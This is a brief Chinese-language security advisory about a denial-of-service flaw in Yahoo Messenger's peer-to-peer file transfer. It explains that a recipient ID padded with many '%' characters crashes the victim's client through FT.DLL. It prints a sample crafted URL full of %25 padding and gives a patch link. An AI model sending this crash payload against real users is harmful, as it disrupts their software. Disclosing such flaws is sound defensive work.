详细描述：

　　Yahoo messenger中的文件传输选项漏洞能让远程攻击者关闭受害人的yahoo messenger客户端。

　　Yahoo messenger能过滤掉yahooID中的一些特别字符（象&,?），当攻击者发送一个文件到 “受害人的ID%%%%%%%%%（超过73个字符）”时，服务器端过滤掉%字符署名“受害者ID”并打开一个文件传输会话，如果受害人接受了这个文件，他的客户端就会提示存取出错并关闭，出错的原因是负责yahoo messenger P2P文件传输中的一个FT.DLL文件造成的。

　　攻击者发送给受害者机器的样本地址：

　　http://10.10.10.1:81/Messenger.victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25.1066206307331File.txt?AppID=Messenger&UserID=victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25&K=lc9ly5954h9doeawsg31h9tgta6c7dtod8bqxrt2vykgw5e5j9dao0o9 doeawsg31h9t8vey6uq19

　　6y 14 53

　　Messenger.vicitimid%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.1066377306549File.TXT

　　补丁： http://cn.messenger.yahoo.com/